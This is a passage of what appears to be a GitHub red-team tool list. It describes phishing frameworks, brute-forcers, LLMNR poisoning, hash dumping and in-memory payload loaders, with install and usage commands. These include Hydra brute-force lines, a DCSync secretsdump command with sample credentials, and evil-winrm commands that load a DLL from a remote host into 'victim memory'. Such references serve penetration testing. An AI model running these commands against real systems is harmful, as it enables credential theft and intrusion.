2.83Z"></path></svg></a></div> <p dir="auto">The Bash Bunny is a physical USB attack tool and multi-function payload delivery system. It is designed to be plugged into a computer's USB port and can be programmed to perform a variety of functions, including manipulating and exfiltrating data, installing malware, and bypassing security measures.</p> <p dir="auto"><a href="https://hackinglab.cz/en/blog/bash-bunny-guide/" rel="nofollow">hackinglab: Bash Bunny – Guide</a></p> <p dir="auto"><a href="https://docs.hak5.org/bash-bunny/" rel="nofollow">Hak5 Documentation</a></p> <p dir="auto"><a href="https://github.com/hak5/bashbunny-payloads">Nice Payload Repo</a></p> <p dir="auto"><a href="https://hak5.org/products/bash-bunny" rel="nofollow">Product Page</a></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/209868292-cc02ce20-7d8e-4019-b953-7082fb0eb828.png"><img src="https://user-images.githubusercontent.com/100603074/209868292-cc02ce20-7d8e-4019-b953-7082fb0eb828.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/fin3ss3g0d/evilgophish">EvilGoPhish</a></h3><a id="user-content-evilgophish" class="anchor" aria-label="Permalink: 🔙EvilGoPhish" href="#evilgophish"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">evilginx2 + gophish. (GoPhish) Gophish is a powerful, open-source phishing framework that makes it easy to test your organization's exposure to phishing. (evilginx2) Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/fin3ss3g0d/evilgophish"><pre>git clone https://github.com/fin3ss3g0d/evilgophish</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="Usage: ./setup <root domain> <subdomain(s)> <root domain bool> <redirect url> <feed bool> <rid replacement> <blacklist bool> - root domain - the root domain to be used for the campaign - subdomains - a space separated list of evilginx2 subdomains, can be one if only one - root domain bool - true or false to proxy root domain to evilginx2 - redirect url - URL to redirect unauthorized Apache requests - feed bool - true or false if you plan to use the live feed - rid replacement - replace the gophish default "rid" in phishing URLs with this value - blacklist bool - true or false to use Apache blacklist Example: ./setup.sh example.com "accounts myaccount" false https://redirect.com/ true user_id false"><pre class="notranslate"><code>Usage: ./setup <root domain> <subdomain(s)> <root domain bool> <redirect url> <feed bool> <rid replacement> <blacklist bool> - root domain - the root domain to be used for the campaign - subdomains - a space separated list of evilginx2 subdomains, can be one if only one - root domain bool - true or false to proxy root domain to evilginx2 - redirect url - URL to redirect unauthorized Apache requests - feed bool - true or false if you plan to use the live feed - rid replacement - replace the gophish default "rid" in phishing URLs with this value - blacklist bool - true or false to use Apache blacklist Example: ./setup.sh example.com "accounts myaccount" false https://redirect.com/ true user_id false </code></pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/191007680-890acda1-72ec-429e-9c91-b2cae55d7189.png"><img src="https://user-images.githubusercontent.com/100603074/191007680-890acda1-72ec-429e-9c91-b2cae55d7189.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/IO1337/social-engineering-toolkit">Social Engineer Toolkit (SET)</a></h3><a id="user-content-social-engineer-toolkit-set" class="anchor" aria-label="Permalink: 🔙Social Engineer Toolkit (SET)" href="#social-engineer-toolkit-set"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">This framework is great for creating campaigns for initial access, 'SET has a number of custom attack vectors that allow you to make a believable attack quickly'.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/IO1337/social-engineering-toolkit; cd set; python setup.py install"><pre>git clone https://github.com/IO1337/social-engineering-toolkit<span class="pl-k">;</span> <span class="pl-c1">cd</span> <span class="pl-c1">set</span><span class="pl-k">;</span> python setup.py install</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="python3 setoolkit"><pre>python3 setoolkit</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/191690233-e1f4255a-514e-4887-94da-b8a3396025f0.png"><img src="https://user-images.githubusercontent.com/100603074/191690233-e1f4255a-514e-4887-94da-b8a3396025f0.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/vanhauser-thc/thc-hydra">Hydra</a></h3><a id="user-content-hydra" class="anchor" aria-label="Permalink: 🔙Hydra" href="#hydra"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Nice tool for logon brute force attacks. Can bf a number of services including SSH, FTP, TELNET, HTTP etc.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="sudo apt install hydra"><pre>sudo apt install hydra</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="hydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form "login.php:username-^USER^&password=^PASS^:Error" hydra -L USER.TXT -P PASS.TXT 1.1.1.1 ssh"><pre>hydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form <span class="pl-s"><span class="pl-pds">"</span>login.php:username-^USER^&password=^PASS^:Error<span class="pl-pds">"</span></span> hydra -L USER.TXT -P PASS.TXT 1.1.1.1 ssh</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/193459614-365876d5-09da-4f29-b850-0480944f0097.png"><img src="https://user-images.githubusercontent.com/100603074/193459614-365876d5-09da-4f29-b850-0480944f0097.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/secureworks/squarephish">SquarePhish</a></h3><a id="user-content-squarephish" class="anchor" aria-label="Permalink: 🔙SquarePhish" href="#squarephish"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">SquarePhish is an advanced phishing tool that uses a technique combining OAuth Device code authentication flow and QR codes (See <a href="https://github.com/secureworks/PhishInSuits">PhishInSuits</a> for more about OAuth Device Code flow for phishing attacks).</p> <p dir="auto">Attack Steps:</p> <ul dir="auto"> <li>Send malicious QR code to victim</li> <li>Victim scans QR code with mobile device</li> <li>Victim directed to attacker controlled server (Triggering OAuth Device Code authentication flow process)</li> <li>Victim emailed MFA code (Triggering OAuth Device Code flow 15 minute timer)</li> <li>Attacker polls for authentication</li> <li>Victim enters code into legit Microsoft website</li> <li>Attacker saves authentication token</li> </ul> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/secureworks/squarephish; cd squarephish; pip install -r requirements.txt"><pre>git clone https://github.com/secureworks/squarephish<span class="pl-k">;</span> <span class="pl-c1">cd</span> squarephish<span class="pl-k">;</span> pip install -r requirements.txt</pre></div> <p dir="auto"><strong>Note:</strong> <em>Before using either module, update the required information in the settings.config file noted with <code>Required</code>.</em></p> <p dir="auto"><strong>Usage (Email Module):</strong></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL] optional arguments: -h, --help show this help message and exit -c CONFIG, --config CONFIG squarephish config file [Default: settings.config] --debug enable server debugging -e EMAIL, --email EMAIL victim email address to send initial QR code email to"><pre class="notranslate"><code>usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL] optional arguments: -h, --help show this help message and exit -c CONFIG, --config CONFIG squarephish config file [Default: settings.config] --debug enable server debugging -e EMAIL, --email EMAIL victim email address to send initial QR code email to </code></pre></div> <p dir="auto"><strong>Usage (Server Module):</strong></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="usage: squish.py server [-h] [-c CONFIG] [--debug] optional arguments: -h, --help show this help message and exit -c CONFIG, --config CONFIG squarephish config file [Default: settings.config] --debug enable server debugging"><pre class="notranslate"><code>usage: squish.py server [-h] [-c CONFIG] [--debug] optional arguments: -h, --help show this help message and exit -c CONFIG, --config CONFIG squarephish config file [Default: settings.config] --debug enable server debugging </code></pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/208217359-70e3ebd4-5cbf-40b9-9e4b-ca1608e4422f.png"><img src="https://user-images.githubusercontent.com/100603074/208217359-70e3ebd4-5cbf-40b9-9e4b-ca1608e4422f.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/securestate/king-phisher">King Phisher</a></h3><a id="user-content-king-phisher" class="anchor" aria-label="Permalink: 🔙King Phisher" href="#king-phisher"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">King Phisher is a tool that allows attackers to create and send phishing emails to victims to obtain sensitive information.</p> <p dir="auto">It includes features like customizable templates, campaign management, and email sending capabilities, making it a powerful and easy-to-use tool for carrying out phishing attacks. With King Phisher, atackers can target individuals or organizations with targeted and convincing phishing emails, increasing the chances of success in their attacks.</p> <p dir="auto"><strong>Install (Linux - Client & Server):</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh && \ sudo bash ./install.sh"><pre>wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh <span class="pl-k">&&</span> \ sudo bash ./install.sh</pre></div> <p dir="auto"><strong>Usage:</strong></p> <p dir="auto">Once King Phisher has been installed please follow the <a href="https://github.com/rsmusllp/king-phisher/wiki/Getting-Started">wiki page</a> to setup SSH, Database config, SMTP server etc.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/208217377-a6d36613-4ffe-486d-a630-99ed1bb7ed2d.png"><img src="https://user-images.githubusercontent.com/100603074/208217377-a6d36613-4ffe-486d-a630-99ed1bb7ed2d.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h1 tabindex="-1" class="heading-element" dir="auto">Execution</h1><a id="user-content-execution" class="anchor" aria-label="Permalink: Execution" href="#execution"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/SpiderLabs/Responder">Responder</a></h3><a id="user-content-responder" class="anchor" aria-label="Permalink: 🔙Responder" href="#responder"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Responder is a tool for poisoning the LLMNR and NBT-NS protocols on a network, to allow for credential capture and arbitrary code execution.</p> <p dir="auto">The LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) protocols are used by Windows systems to resolve hostnames to IP addresses on a local network. If a hostname cannot be resolved using these protocols, the system will broadcast a request for the hostname to the local network.</p> <p dir="auto">Responder listens for these broadcasts and responds with a fake IP address, tricking the requesting system into sending its credentials to the attacker.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/SpiderLabs/Responder#usage cd Responder"><pre>git clone https://github.com/SpiderLabs/Responder#usage <span class="pl-c1">cd</span> Responder</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Running the tool ./Responder.py [options] # Typical usage ./Responder.py -I eth0 -wrf"><pre><span class="pl-c"><span class="pl-c">#</span> Running the tool</span> ./Responder.py [options] <span class="pl-c"><span class="pl-c">#</span> Typical usage</span> ./Responder.py -I eth0 -wrf</pre></div> <p dir="auto">Full usage information can be found <a href="https://github.com/SpiderLabs/Responder#usage">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210266150-b9cbd4a0-d07b-435a-8fa9-bc0b88d2c6ae.png"><img src="https://user-images.githubusercontent.com/100603074/210266150-b9cbd4a0-d07b-435a-8fa9-bc0b88d2c6ae.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/" rel="nofollow">https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/fortra/impacket/blob/master/examples/secretsdump.py">secretsdump</a></h3><a id="user-content-secretsdump" class="anchor" aria-label="Permalink: 🔙secretsdump" href="#secretsdump"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A utility that is part of the Impacket library that can be used to extract password hashes and other secrets from a Windows system.</p> <p dir="auto">It does this by interacting with the Security Account Manager (SAM) database on the system and extracting the hashed passwords and other information, such as:</p> <ul dir="auto"> <li>Password hashes for local accounts</li> <li>Kerberos tickets and keys</li> <li>LSA Secrets</li> </ul> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="python3 -m pip install impacket"><pre>python3 -m pip install impacket</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Extract NTLM hashes with local files secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL # DCSync attack and dump the NTLM hashes of all domain users. secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:Sheffield19@10.10.10.30"><pre><span class="pl-c"><span class="pl-c">#</span> Extract NTLM hashes with local files</span> secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL <span class="pl-c"><span class="pl-c">#</span> DCSync attack and dump the NTLM hashes of all domain users.</span> secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:Sheffield19@10.10.10.30</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210266110-8f60d6e8-009a-4dea-9e33-8a712aeaf2ac.png"><img src="https://user-images.githubusercontent.com/100603074/210266110-8f60d6e8-009a-4dea-9e33-8a712aeaf2ac.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy" rel="nofollow">https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/Hackplayers/evil-winrm">evil-winrm</a></h3><a id="user-content-evil-winrm" class="anchor" aria-label="Permalink: 🔙evil-winrm" href="#evil-winrm"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Evil-WinRM is a tool that provides a command line interface for Windows Remote Management (WinRM: <em>A service that allows administrators to remotely execute commands on a Windows machine</em>).</p> <p dir="auto">Evil-WinRM allows an attacker to remotely connect to a Windows machine using WinRM and execute arbitrary commands.</p> <p dir="auto">Some features include:</p> <ul dir="auto"> <li>Loading in memory Powershell scripts</li> <li>Loading in memory dll files bypassing some AVs</li> <li>Loading x64 payloads</li> <li>Pass-the-hash support</li> <li>Uploading and downloading local and remote files</li> </ul> <p dir="auto"><strong>Install: (Git)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="sudo gem install winrm winrm-fs stringio logger fileutils git clone https://github.com/Hackplayers/evil-winrm.git cd evil-winrm"><pre>sudo gem install winrm winrm-fs stringio logger fileutils git clone https://github.com/Hackplayers/evil-winrm.git <span class="pl-c1">cd</span> evil-winrm</pre></div> <p dir="auto"><strong>Install: (Ruby gem)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="gem install evil-winrm"><pre>gem install evil-winrm</pre></div> <p dir="auto">Alternative installation instructions can be found <a href="https://github.com/Hackplayers/evil-winrm#installation--quick-start-4-methods">here</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Connect to 192.168.1.100 as Administrator with custom exe/ps1 download folder locations evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/' # Upload local files to victim upload local_filename upload local_filename destination_filename # Download remote files to local machine download remote_filename download remote_filename destination_filename # Execute .Net assembly into victim memory Invoke-Binary /opt/csharp/Rubeus.exe # Load DLL library into victim memory Dll-Loader -http http://10.10.10.10/SharpSploit.dll"><pre><span class="pl-c"><span class="pl-c">#</span> Connect to 192.168.1.100 as Administrator with custom exe/ps1 download folder locations</span> evil-winrm -i 192.168.1.100 -u Administrator -p <span class="pl-s"><span class="pl-pds">'</span>MySuperSecr3tPass123!<span class="pl-pds">'</span></span> -s <span class="pl-s"><span class="pl-pds">'</span>/home/foo/ps1_scripts/<span class="pl-pds">'</span></span> -e <span class="pl-s"><span class="pl-pds">'</span>/home/foo/exe_files/<span class="pl-pds">'</span></span> <span class="pl-c"><span class="pl-c">#</span> Upload local files to victim</span> upload local_filename upload local_filename destination_filename <span class="pl-c"><span class="pl-c">#</span> Download remote files to local machine</span> download remote_filename download remote_filename destination_filename <span class="pl-c"><span class="pl-c">#</span> Execute .Net assembly into victim memory</span> Invoke-Binary /opt/csharp/Rubeus.exe <span class="pl-c"><span class="pl-c">#</span> Load DLL library into victim memory</span> Dll-Loader -http http://10.10.10.10/SharpSploit.dll</pre></div> <p dir="auto">Full usage documentation can be found <a href="https://github.com/Hackplayers/evil-winrm#documentation">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210266192-ad53c125-7b3b-4a91-89c1-01c42cb21ef3.png"><img src="https://user-images.githubusercontent.com/100603074/210266192-ad53c125-7b3b-4a91-89c1-01c42cb21ef3.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://korbinian-spielvogel.de/posts/heist-writeup/" rel="nofollow">https://korbinian-spielvogel.de/posts/heist-writeup/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/TheWover/donut/">Donut</a></h3><a id="user-content-donut" class="anchor" aria-label="Permalink: 🔙Donut" href="#donut"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A tool for in-memory execution of VBScript, JScript, EXE, DLL files and dotNET assemblies. It can be used to load and run custom payloads on target systems without the need to drop files to disk.</p> <p dir="auto"><strong>Install: (Windows)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone http://github.com/thewover/donut.git"><pre>git clone http://github.com/thewover/donut.git</pre></div> <p dir="auto">To generate the loader template, dynamic library donut.dll, the static library donut.lib and the generator donut.exe. Start an x64 Microsoft Visual Studio Developer Command Prompt, change to the directory where you cloned the Donut repository and enter the following:</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="nmake -f Makefile.msvc"><pre>nmake -f Makefile.msvc</pre></div> <p dir="auto">To do the same, except using MinGW-64 on Windows or Linux, change to the directory where you cloned the Donut repository and enter the following:</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="make -f Makefile.mingw"><pre>make -f Makefile.mingw</pre></div> <p dir="auto"><strong>Install: (Linux)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="pip3 install donut-shellcode"><pre>pip3 install 